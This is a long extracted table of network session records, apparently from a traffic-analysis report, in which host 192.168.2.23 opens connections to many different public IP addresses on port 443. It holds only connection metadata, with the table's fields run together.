                                            14576192.168.2.235339875.245.80.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14577192.168.2.233702080.118.85.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14578192.168.2.2346016178.139.247.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14579192.168.2.2345468198.103.246.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14580192.168.2.233953442.90.102.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14581192.168.2.2337108137.136.188.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14582192.168.2.2360728137.62.184.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14583192.168.2.234926044.213.22.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14584192.168.2.233320451.112.159.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14585192.168.2.235420492.191.126.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14586192.168.2.233647493.36.187.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14587192.168.2.233418032.242.192.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14588192.168.2.2344162154.139.77.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14589192.168.2.234905280.19.153.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14590192.168.2.234140065.67.104.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14591192.168.2.2334394107.254.79.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14592192.168.2.234294648.69.60.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14593192.168.2.2351544164.26.83.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14594192.168.2.2334060155.64.81.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14595192.168.2.235686872.45.93.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14596192.168.2.2352184155.166.109.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14597192.168.2.2336812211.57.203.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14598192.168.2.2351740190.45.103.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14599192.168.2.234322617.121.228.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14600192.168.2.2346008174.214.157.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14601192.168.2.234559636.116.176.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14602192.168.2.234638676.178.218.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14603192.168.2.2345974103.70.224.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14604192.168.2.2337922186.139.166.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14605192.168.2.2348580117.42.106.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14606192.168.2.2356116167.249.229.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14607192.168.2.236010424.202.204.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14608192.168.2.235653478.188.130.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14609192.168.2.233465440.85.42.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14610192.168.2.2360456111.226.22.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14611192.168.2.235428866.44.52.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14612192.168.2.2352268176.84.36.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14613192.168.2.234550270.73.29.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14614192.168.2.2347372172.165.206.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14615192.168.2.2347930190.3.191.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14616192.168.2.2356036139.23.246.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14617192.168.2.233558234.77.250.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14618192.168.2.2349954163.96.160.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14619192.168.2.235463071.21.165.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14620192.168.2.2339538208.189.215.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14621192.168.2.235469875.243.101.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14622192.168.2.233941082.19.123.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14623192.168.2.2339612182.95.44.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14624192.168.2.2348786135.67.94.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14625192.168.2.2352180115.220.73.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14626192.168.2.2354736178.94.61.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14627192.168.2.2345360143.138.77.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14628192.168.2.2360898156.80.46.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14629192.168.2.234003061.24.239.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14630192.168.2.2349856205.120.120.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14631192.168.2.2349246114.138.48.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14632192.168.2.2334484206.143.166.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14633192.168.2.235255458.56.0.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14634192.168.2.235164452.242.125.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14635192.168.2.2357790188.165.250.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14636192.168.2.233420854.44.67.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14637192.168.2.2350228136.171.110.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14638192.168.2.233282486.67.19.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14639192.168.2.234185689.242.94.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14640192.168.2.2337750196.128.222.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14641192.168.2.233642218.6.97.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14642192.168.2.234153290.253.245.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14643192.168.2.23553465.115.15.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14644192.168.2.235467883.0.153.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14645192.168.2.2360304111.126.200.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14646192.168.2.2350002218.18.248.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14647192.168.2.235422485.136.173.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14648192.168.2.2356154115.169.32.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14649192.168.2.2345908120.129.212.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14650192.168.2.2344156131.207.201.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14651192.168.2.23493148.221.96.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14652192.168.2.234744417.236.159.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14653192.168.2.235655451.229.240.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14654192.168.2.2358874135.164.191.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14655192.168.2.2340904125.29.30.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14656192.168.2.235209087.159.89.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14657192.168.2.236074493.85.114.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14658192.168.2.2337820145.19.51.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14659192.168.2.234188284.151.134.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14660192.168.2.2343528141.135.183.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14661192.168.2.233639643.34.36.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14662192.168.2.233761643.91.238.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14663192.168.2.2350122156.66.79.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14664192.168.2.2349414163.228.241.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14665192.168.2.2350356132.234.76.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14666192.168.2.2340464146.199.8.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14667192.168.2.233652871.232.3.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14668192.168.2.235826445.182.254.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14669192.168.2.2360784102.106.140.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14670192.168.2.235591060.144.104.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14671192.168.2.2339248180.24.111.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14672192.168.2.234636045.104.110.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14673192.168.2.233691627.109.25.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14674192.168.2.233887267.159.245.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14675192.168.2.23427485.232.79.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14676192.168.2.235050647.56.209.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14677192.168.2.2355234114.212.42.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14678192.168.2.23608729.202.78.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14679192.168.2.2349906154.247.12.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14680192.168.2.235312623.252.79.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14681192.168.2.2357938213.230.23.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14682192.168.2.234166284.85.238.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14683192.168.2.2348198102.93.75.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14684192.168.2.235536268.14.83.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14685192.168.2.2345994157.107.113.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14686192.168.2.234380813.254.200.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14687192.168.2.235064049.99.43.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14688192.168.2.234892023.39.166.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14689192.168.2.2342050101.203.127.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14690192.168.2.2344678217.136.76.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14691192.168.2.234520444.247.0.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14692192.168.2.235660832.42.210.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14693192.168.2.23469748.98.181.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14694192.168.2.233703466.165.82.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14695192.168.2.2355148165.3.201.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14696192.168.2.2344834199.188.115.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14697192.168.2.2340300117.54.33.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14698192.168.2.234765614.179.75.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14699192.168.2.2342966151.218.253.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14700192.168.2.233971446.152.47.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14701192.168.2.2355082213.63.195.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14702192.168.2.234946864.96.29.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14703192.168.2.2337624204.209.220.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14704192.168.2.2349922156.86.150.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14705192.168.2.2339528146.226.164.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14706192.168.2.2355292109.124.244.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14707192.168.2.235406881.242.117.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14708192.168.2.2334196134.3.113.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14709192.168.2.233337237.152.145.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14710192.168.2.235121440.76.102.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14711192.168.2.2344482104.151.172.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14712192.168.2.235890650.249.14.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14713192.168.2.233475627.62.115.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14714192.168.2.2352994203.193.74.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14715192.168.2.2337048138.59.167.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14716192.168.2.234055665.87.202.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14717192.168.2.2334320117.149.80.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14718192.168.2.2354998206.165.3.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14719192.168.2.2340574137.210.10.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14720192.168.2.2352848217.144.100.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14721192.168.2.2339912115.41.94.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14722192.168.2.2351128217.21.49.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14723192.168.2.2352842203.224.127.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14724192.168.2.234112842.76.42.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14725192.168.2.2350624151.119.40.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14726192.168.2.235282296.3.146.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14727192.168.2.2349930202.112.38.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14728192.168.2.2350772136.36.120.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14729192.168.2.2339910112.66.178.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14730192.168.2.2350422151.81.65.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14731192.168.2.23531648.19.65.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14732192.168.2.234725850.45.105.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14733192.168.2.2343994147.245.150.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14734192.168.2.23547169.88.28.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14735192.168.2.2346438180.118.137.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14736192.168.2.2335620173.158.228.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14737192.168.2.233975862.118.39.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14738192.168.2.2358806104.147.48.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14739192.168.2.234325248.222.202.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14740192.168.2.2357940180.158.0.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14741192.168.2.2351280113.234.179.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14742192.168.2.2355358187.52.133.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14743192.168.2.2346826121.67.134.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14744192.168.2.2348838121.63.157.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14745192.168.2.2359440124.85.139.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14746192.168.2.23432608.58.224.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14747192.168.2.235689698.64.219.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14748192.168.2.2349152202.92.205.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14749192.168.2.233412851.116.243.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14750192.168.2.2357984157.41.60.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14751192.168.2.235884684.186.24.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14752192.168.2.2338338196.88.43.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14753192.168.2.233619074.6.204.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14754192.168.2.2347040174.176.44.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14755192.168.2.2358934174.2.145.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14756192.168.2.235148878.98.42.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14757192.168.2.2350966113.2.253.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14758192.168.2.2332930158.222.44.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14759192.168.2.2335696153.239.187.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14760192.168.2.2360852107.2.56.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14761192.168.2.2334896156.189.142.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14762192.168.2.2340168175.124.222.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14763192.168.2.234631679.50.201.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14764192.168.2.2350580114.223.160.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14765192.168.2.235885697.232.122.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14766192.168.2.234831817.14.7.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14767192.168.2.2355456121.126.179.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14768192.168.2.2352212189.187.187.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14769192.168.2.2344398112.153.117.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14770192.168.2.2337616120.96.67.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14771192.168.2.235276890.252.196.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14772192.168.2.2359646201.220.31.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14773192.168.2.235386499.124.45.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14774192.168.2.233550042.101.174.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14775192.168.2.235834452.176.32.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14776192.168.2.2343468126.23.158.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14777192.168.2.2339946107.118.85.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14778192.168.2.2335632217.127.57.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14779192.168.2.234617867.160.190.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14780192.168.2.234104431.229.147.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14781192.168.2.235106675.142.152.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14782192.168.2.2345552199.158.184.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14783192.168.2.235351043.5.146.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14784192.168.2.233438436.77.92.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14785192.168.2.2360084108.69.179.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14786192.168.2.2359810141.16.37.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14787192.168.2.2338314182.16.99.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14788192.168.2.235030477.105.27.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14789192.168.2.2344280136.208.2.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14790192.168.2.235792634.72.160.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14791192.168.2.2340444169.130.212.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14792192.168.2.233575073.31.147.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14793192.168.2.236032885.113.148.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14794192.168.2.233796465.61.148.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14795192.168.2.2347972111.132.116.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14796192.168.2.2342586186.72.96.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14797192.168.2.2360576150.237.125.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
